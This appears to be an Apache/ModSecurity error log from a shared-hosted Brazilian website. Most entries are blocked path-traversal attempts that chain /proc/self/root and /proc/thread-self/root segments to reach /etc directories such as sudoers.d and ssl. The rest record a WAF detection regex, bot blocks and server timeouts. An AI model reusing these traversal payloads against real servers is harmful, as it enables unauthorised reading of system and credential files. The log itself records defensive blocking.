[Thu Mar 19 05:52:43.284788 2026] [:error] [pid 17887:tid 140411641214720] [client 74.7.243.128:50748] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu5WwkwaGbbGflqUZCPygAAAMw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:52:43.730665 2026] [:error] [pid 27293:tid 140411599251200] [client 74.7.244.43:47072] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abu5W_-YZRR_7pZ7nDJmAAAAA9E"]
[Thu Mar 19 05:53:09.307296 2026] [:error] [pid 30077:tid 140411691570944] [client 74.7.243.128:52758] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu5dfu8EFLIOrSqIpt4CwAAAkY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 05:53:13.659768 2026] [:error] [pid 17887:tid 140411649607424] [client 216.73.216.191:51974] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu5eQkwaGbbGflqUZCP7QAAAMs"]
[Thu Mar 19 05:53:14.145798 2026] [proxy_fcgi:error] [pid 17887:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:59920] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 05:53:36.559539 2026] [mime_magic:error] [pid 26799:tid 140411548894976] (70014)End of file found: [client 57.141.18.32:33956] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 05:53:46.811079 2026] [:error] [pid 31803:tid 140411607643904] [client 74.7.243.128:39306] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu5muyqAr6etmhZHNo8BwAAAFA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:53:48.125485 2026] [proxy_fcgi:error] [pid 27293:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:60668] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 05:54:19.126162 2026] [proxy_fcgi:error] [pid 14269:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:33156] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 05:54:23.708591 2026] [:error] [pid 15826:tid 140411548894976] [client 74.7.243.128:38078] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu5v-oXxyEfFpUF8f_o6QAAAVc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:54:29.104365 2026] [mime_magic:error] [pid 30077:tid 140411565680384] (70014)End of file found: [client 57.141.18.108:35126] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 05:54:43.137816 2026] [proxy_fcgi:error] [pid 27293:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:33792] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 05:54:45.063830 2026] [:error] [pid 14269:tid 140411666392832] [client 74.7.243.128:56032] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu51QbLMZ6AikZjR9U13gAAAAk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 05:54:54.025469 2026] [:error] [pid 17653:tid 140411691570944] [client 74.7.243.128:35936] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu53sdf6f5d65gmYZRM2gAAAsY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 05:55:06.189699 2026] [proxy_fcgi:error] [pid 31803:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:34302] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 05:55:23.865417 2026] [:error] [pid 19093:tid 140411632822016] [client 74.7.228.61:48710] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abu5-1_V7PWP6ixUYl6UQAAAAo0"]
[Thu Mar 19 05:55:29.123136 2026] [proxy_fcgi:error] [pid 19093:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:34802] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 05:55:46.864131 2026] [:error] [pid 26799:tid 140411683178240] [client 74.7.243.128:58414] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu6Eta6ubjKNq_cu4YddAAAA0c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:55:52.129888 2026] [proxy_fcgi:error] [pid 17887:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:35426] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 05:56:04.412453 2026] [:error] [pid 27293:tid 140411649607424] [client 74.7.243.128:49690] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu6JP-YZRR_7pZ7nDJmcgAAA8s"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:56:14.045876 2026] [proxy_fcgi:error] [pid 19093:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:35982] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 05:56:35.699652 2026] [mime_magic:error] [pid 17887:tid 140411599251200] (70014)End of file found: [client 57.141.18.82:38318] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 05:56:36.081876 2026] [proxy_fcgi:error] [pid 31803:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:36486] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 05:56:59.129810 2026] [proxy_fcgi:error] [pid 30077:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:37032] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 05:57:21.125826 2026] [proxy_fcgi:error] [pid 14269:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:37530] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 05:57:43.125841 2026] [proxy_fcgi:error] [pid 26799:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:37976] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 05:57:45.039284 2026] [:error] [pid 19093:tid 140411582465792] [client 74.7.244.43:39628] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abu6iV_V7PWP6ixUYl6UmwAAApM"]
[Thu Mar 19 05:58:07.141775 2026] [proxy_fcgi:error] [pid 27293:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:38472] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 05:58:23.046596 2026] [core:alert] [pid 30077:tid 140411574073088] [client 57.141.18.38:40896] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 05:58:37.121824 2026] [proxy_fcgi:error] [pid 19093:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:39054] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 05:59:11.129888 2026] [proxy_fcgi:error] [pid 17887:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:39796] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 05:59:41.045903 2026] [proxy_fcgi:error] [pid 27293:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:40408] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:00:10.133835 2026] [proxy_fcgi:error] [pid 27403:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:41072] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:00:20.470972 2026] [mime_magic:error] [pid 30077:tid 140411691570944] (70014)End of file found: [client 57.141.18.87:43376] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 06:00:32.407037 2026] [:error] [pid 17653:tid 140411624429312] [client 74.7.228.61:38232] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abu7MMdf6f5d65gmYZRNjAAAAs4"]
[Thu Mar 19 06:00:37.045841 2026] [proxy_fcgi:error] [pid 14269:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:41666] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:01:00.133804 2026] [proxy_fcgi:error] [pid 14269:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:42328] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:01:23.137854 2026] [proxy_fcgi:error] [pid 27403:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:42934] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:01:47.441925 2026] [proxy_fcgi:error] [pid 27403:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:43488] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:02:04.315371 2026] [:error] [pid 31803:tid 140411741927168] [client 74.7.243.128:35894] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu7jOyqAr6etmhZHNo9RgAAAEA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 06:02:07.832683 2026] [:error] [pid 26799:tid 140411582465792] [client 74.7.243.128:33622] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu7jta6ubjKNq_cu4YeXwAAA1M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 06:02:09.145800 2026] [proxy_fcgi:error] [pid 26799:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:44022] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:02:16.561528 2026] [:error] [pid 26799:tid 140411616036608] [client 74.7.243.128:33624] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu7mNa6ubjKNq_cu4YeZwAAA08"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 06:02:23.810318 2026] [:error] [pid 30077:tid 140411674785536] [client 74.7.243.128:37382] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu7n_u8EFLIOrSqIpt5VgAAAkg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 06:02:27.233313 2026] [:error] [pid 26799:tid 140411590858496] [client 74.7.243.128:60698] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu7o9a6ubjKNq_cu4YedQAAA1I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 06:02:28.506058 2026] [:error] [pid 19093:tid 140411590858496] [client 74.7.243.128:60700] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu7pF_V7PWP6ixUYl6VEQAAApI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 06:02:32.801812 2026] [proxy_fcgi:error] [pid 14269:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:44540] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:02:40.764814 2026] [:error] [pid 17653:tid 140411632822016] [client 74.7.243.128:53024] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu7sMdf6f5d65gmYZRN2QAAAs0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
